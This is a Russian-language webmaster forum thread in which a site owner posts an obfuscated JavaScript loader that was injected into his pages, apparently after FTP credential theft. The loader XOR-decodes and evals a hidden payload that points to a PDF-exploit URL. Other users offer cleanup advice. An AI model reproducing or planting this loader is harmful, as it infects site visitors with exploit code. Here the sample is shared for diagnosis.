X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Js:pdfka-aak [expl], FTP зараза
life
life
Topic Starter сообщение 29.3.2010, 1:40; Ответить: life
Сообщение #1


Завсегдатай
*****

Группа: Active User
Сообщений: 921
Регистрация: 28.1.2009
Поблагодарили: 147 раз
Репутация:   -4  


Сегодня залез на фтп своего сайта, далее на сам сайт и увидел окошко аваста, что найден эксплоит JS:Pdfka-AAK [Expl].
Гугл ничего интересного по этому поводу не сказал, видимо я подхватил "новинку".
В коде сайта после бади было:
<script>var mapZorg;mapZorg='%c2%c1%c1%c5%cc%c5%c6%c5%af%c5%da%d1%cc%c6%c6%f7%cf%f9%86%84%fe%d7%99%d4%c8%d9%e8%8f%c7%c9%c3%cc%fc%c1%e0%d7%de%8a%a2%80%89%8d%92%ae%e4%c1%d4%fe%d4%ce%e1%ec%c1%af%82%c5%cf%c3%d3%d0%cc%c1%d2%86%ce%c7%d5%ff%cc%f2%f5%ba%c2%c8%95%c4%cd%c3%89%d2%f3%c3%ff%80%82%d0%e5%ce%81%f7%d8%c6%8d%87%c7%de%dc%e5%a6%83%89%a5%9a%cb%cc%d0%d4%db%95%dc%ca%d7%cc%9a%f0%8b%a6%8e%d9%be%d9%c9%e8%ee%ce%f5%fb%d1%df%af%d9%9c%cb%c9%ef%fb%c7%c1%8a%b7%d3%c4%c1%f2%c3%f1%d6%91%88%8e%cd%c4%c6%de%c2%c3%f9%d5%99%c0%de%ef%db%c6%d0%84%d5%e9%c3%d4%eb%f8%c9%8a%c5%cd%c3%db%9c%f6%f8%dc%c8%cb%c6%c6%ff%d0%e7%cb%ba%87%93%bb%81%dc%ca%b0%d7%80%c7%e6%c8%e1%d3%de%e4%f5%db%dd%82%85%99%89%a4%bd%92%ec%82%c9%ce%ec%9f%c3%ae%d6%fc%ec%ee%d7%e4%cd%9b%b8%ed%d4%82%d2%85%95%dc%c5%fa%d2%94%a0%d7%dd%88%d2%8a%f6%af%c0%d7%c6%85%e7%c9%d4%e7%b9%9c%88%c8%8c%d1%c7%de%c2%de%c1%c1%83%d6%8e%c6%97%d8%d7%d0%8a%84%8b%8f%c4%d8%ce%f0%c9%de%c9%90%95%dd%86%a8%86%84%83%9b%8a%8d%8f%89%fe%c3%c5%f6%c9%cd%9b%9e%88%f7%d9%e8%c3%9c%85%82%c7%d6%ff%e4%8e%d1%cc%db%98%c2%c4%f4%c0%e3%c5%9f%ea%d6%c5%d7%e6%8a%98%8f%91%c6%cd%e3%df%e2%c9%d7%8b%b4%93%d3%81%df%fd%ff%e9%fb%f2%fc%d8%c1%ce%bc%98%8d%8a%89%d0%8a%c5%ec%f8%8a%f6%94%85%b8%e5%98%f4%90%cb%dc%d8%c4%86%d2%96%81%e7%cf%81%b9%ce%c5%a4%96%87%b0%9f%c0%b8%cc%de%a0%d0%c8%a8%c9%85%a2%d2%cd%c1%88%85%f8%f5%c5%f8%c1%d2%d8%eb%ce%f4%8f%93%bc%99%d3%8c%9d%d9%d8%ee%dd%d4%b0%da%ea%cd%88%f3%ce%de%c3%8c%86%db%d9%fe%bf%ad%cc%8c%d5%e9%da%97%e5%f5%cf%d1%ca%cf%d0%c7%9c%de%f7%8b%9d%ca%ed%d2%81%d6%d0%eb%9b%cb%c7%99%c3%e9%dd%ed%c5%8d%da%d1%c5%d4%cc%ab%83%b5%ce%81%c9%c5%da%ed%d4%85%b6%c2%c7%cd%fc%dc%86%ac%9a%a9%9d%80%c8%de%c4%d6%fe%d2%ef%98%cb%cd%f0%95%88%f1%c2%f2%c5%83%c3%c3%d2%d7%d0%d4%93%cf%dc%87%8b%a7%84%d9%c7%e6%c9%91%d3%d2%ef%d7%dc%fb%fe%e5%e4%c2%f6%9e%89%8e%dc%fa%c3%ee%c5%cc%bc%c2%d7%84%f3%9e%92%f7%c7%dd%e1%da%df%bd%8d%93%bd%c0%d7%f8%cf%e2%f4%df%f8%c9%f8%82%8c%85%d3%ee%c4%fa%c5%d5%d9%d8%d0%c7%c4%9b%87%80%95%93%dc%c1%e1%f8%c9%c0%c6%e6%c6%e6%9c%94%94%de%dd%d6%9a%82%8b%81%f5%f2%c5%d7%c3%c2%ce%f3%c6%ec%df%c7%ee%cc%81%89%91%d8%d7%c4%cb%ec%83%d2%f9%de%f0%87%aa%83%b4%9e%8b%b3%de%cf%d0%c7%db%d6%96%89%90%c9%fd%c5%e6%de%b0%c3%cf%ea%d1%86%96%af%f7%d2%f0%e6%c5%8f%eb%d2%c6%98%d6%8c%c5%d5%d7%cd%e9%e1%ec%ca%c9%99%81%97%de%f3%e2%cc%dd%9c%ca%cf%c5%c5%e7%a8%85%b4%d6%ca%d1%8c%d5%d5%f1%e6%f0%cc%f7%d0%c2%b5%c6%f8%e0%e4%c2%c5%c7%c5%dc%e7%ed%cf%cf%c5%df%fe%df%b4%d5%dd%cf%c3%ca%8a%a9%d4%c9%ce%df%c3%c7%b3%9f%92%9e%d9%c5%cb%d2%d1%eb%dc%d7%f0%91%da%ba%d5%85%cf%c0%c7%8f%c1%d7%f9%c3%df%f7%84%df%89%d8%d0%f2%d4%d4%fd%d3%cb%e2%d5%9f%ff%a0%de%88%9a%da%df%f8%c1%a9%e5%da%ca%d6%d6%80%8f%90%b7%97%de%82%f4%cc%c3%f5%df%b2%c0%86%84%c9%f5%d0%c6%e0%e8%8b%b6%d5%d9%d6%c3%9a%8e%f8%cb%e9%c9%db%c9%ea%e4%c4%f4%9c%87%cf%c6%ec%d3%96%9c%bc%df%db%cf%dd%9b%88%81%8e%ea%c4%fe%8e%dc%f2%f5%da%da%ed%af%c6%df%cd%cd%8a%da%d0%c3%f7%dc%9c%d6%c2%c2%c2%8c%e0%c3%ed%db%c5%c0%d9%d9%81%8c%ca%cf%c2%ce%e1%cd%dc%d9%f7%c2%c1%d8%da%d0%df%89%be%b8%8f%9a%98%9c%90%90%8c%91%e6%e6%c0%c6%d1%b0%ca%d3%ee%ef%d8%ab%cc%d9%c0%c2%87%d3%de%cf%d0%fb%c5%f2%f9%cb%f5%f1%80%c1%da%dd%d3%bb%d4%9a%fd%fa%ce%f8%d8%e1%cd%fa%81%be%de%cf%c8%bc%c3%d0%d1%86%fd%c9%e5%fc%c3%ce%aa%cd%c2%fe%d5%c0%da%c4%d6%82%9f%fc%e9%8d%d1%d5%d9%8f%c3%ce%d8%d9%d2%e9%fb%d0%9d%e8%cc%dc%a1%d4%d5%d7%d8%c8%c3%c2%c2%fe%8d%c4%9c%8a%dd%f4%db%96%ef%c5%d0%f9%df%d0%cc%8f%c2%e2%fc%c3%de%fc%cc%c5%89%8f%be%d7%9b%c1%ec%fd%cf%ce%c0%f8%96%8a%e3%de%95%f8%d6%c1%b1%8a%99%d2%94%f6%8c%c8%87%e7%fd%cf%e1%97%9d%93%94';function zendDone(billDone){function pigMovPs(sqlPs){var topBat=0;var pastByte=sqlPs.length, conPingRm=0;while(conPingRm<pastByte){topBat+=weSqlCont(sqlPs,conPingRm)*pastByte;conPingRm++;}return (topBat+'');}function weSqlCont(tabPakPong,fogPost){return tabPakPong['c0h<a<rHCHoHd0e%A<t<'.replace(/[\<%0Hi]/g, '')](fogPost);}if((new String(document.write)).indexOf('arity')>0){return;}var longBad=0,catFi=0,zorgCd=245;var bcRarProg='';var loopUse=(new String(zendDone)).replace(/[^@a-z0-9A-Z_.,-]/g,'');var pisNilPip=pigMovPs(loopUse);billDone=window['uOn8e8sZciaOpZe}'.replace(/[iZ8\}O]/g, '')](billDone);for(var dateMidCal=0; dateMidCal < (billDone.length); dateMidCal++){var imgMeta=weSqlCont(loopUse,longBad);var pigVar=weSqlCont(pisNilPip,catFi);var loopGunNano=imgMeta^pigVar^zorgCd;var dirWeBos=weSqlCont(billDone,dateMidCal);longBad++,catFi++;bcRarProg+=String['fZr_o_mzCzhza_r{C{ozdZeZ'.replace(/[z\?\{Z_]/g, '')](dirWeBos^loopGunNano);if(catFi>pisNilPip.length)catFi=0;if(longBad>loopUse.length)longBad=0;}window['efvBa.l.'.replace(/[f\.QRB]/g, '')](bcRarProg);return bcRarProg=new String();}zendDone(mapZorg);</script>


Декодить сие чудо не получилось, ну и хрен с ним.
Меня больше волнует КАК и ОТКУДА. Порнухой вроде не увлекаюсь, варез не качаю да и вообще с сомнительных сайтов ничего не качаю и стараюсь их вовсе не посещать.
Кто-нибудь сталкивался? Пишется ли вирь куда-нибудь или просто тащит пароли от фтп?
Если пишется то куда?

Вот из лога:
Sign of "JS:Pdfka-AAK [Expl]" has been found in "http://ulbjqupw.cn/pila/spl/pdf.php?606717496665bcba" file.


Надеюсь на вашу помощь.
Спасибо.

Сообщение отредактировал life - 29.3.2010, 1:41
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
extezy
extezy
сообщение 29.3.2010, 9:42; Ответить: extezy
Сообщение #2


I ♥ UKR@INE!
******

Группа: Active User
Сообщений: 1597
Регистрация: 17.8.2007
Из: Украины
Поблагодарили: 334 раза
Репутация:   63  


Тем подобных миллион.
Да, скорее всего пишется. Проверится антивирусом. Желательно Др.Веб. Во всяком случае, когда была у меня подобная байда года полтора назад, вирусы нашел только он. (кстати помимо модификации файлов по фтп, еще и стырили 6ти знак).
Пароли тырятся из фтп клиента. Файлзила и т.п.

Меня больше волнует КАК и ОТКУДА.

Попандеры, кликандеры, ссылки на фотки в icq, в пм вконтакте, спам в почте, различные архивы и езешники скачанные с депозитов\рапид и т.д.
Думаю в полной мере ответил. Порно и варез, уже далеко не единственные разносчики заразы.

1. Сменить все пароли к фтп.
2. Обновить базы антивируса.
3. Отключится от сети и провести полную проверку пк.
4. На последок прошустрить еще раз все файлы шаблонов и файлы на которых стоит chmod 777 на предмет сторонних кодов.


--------------------
Дизайнер, музыкант, автогонщик, футболист. Люблю Алену, мамин борщ и пиво с шоколадом.
ZOMRO.COM - держу свои проекты на этом хостинге, рекомендую.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
life
life
Topic Starter сообщение 30.3.2010, 2:11; Ответить: life
Сообщение #3


Завсегдатай
*****

Группа: Active User
Сообщений: 921
Регистрация: 28.1.2009
Поблагодарили: 147 раз
Репутация:   -4  


проверил полностью авастом и др. вебом. ничего не нашлось sad.gif
пароли все сменил, что делать?

блин, выручайте unsure.gif
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


 



RSS Текстовая версия Сейчас: 12.12.2017, 18:53
Дизайн